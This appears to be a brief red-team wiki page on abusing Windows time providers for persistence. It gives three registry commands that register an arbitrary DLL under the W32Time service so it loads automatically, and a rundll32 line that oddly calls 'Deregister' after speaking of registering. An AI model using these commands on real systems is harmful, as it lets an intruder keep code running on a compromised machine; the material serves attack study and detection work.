Time Provider
Windows OS uses time providers to synchronize time with other machines in the network to obtain accurate information from other network devices. Time synchronization is very important as many protocols in AD have this as a requirement.
Note that your dll needs to be coded in a special way, a template of this can be found by Scott Lundgren from Carbon Black:
To use this for persistence, we can add these registry keys
reg add "HKEY_LOCAL_MACHINE\System\CurrentControlSet\Services\W32Time\TimeProviders\TimeProv" /t REG_EXPAND_SZ /v "DllName" /d "%systemroot%\system32\exec.dll" /f
reg add "HKEY_LOCAL_MACHINE\System\CurrentControlSet\Services\W32Time\TimeProviders\TimeProv" /t REG_DWORD /v "Enabled" /d "1" /f
reg add "HKEY_LOCAL_MACHINE\System\CurrentControlSet\Services\W32Time\TimeProviders\TimeProv" /t REG_DWORD /v "InputProvider" /d "1" /fOr use the gametime dll and run the register function from it:
rundll32.exe gametime.dll,DeregisterLast updated
Was this helpful?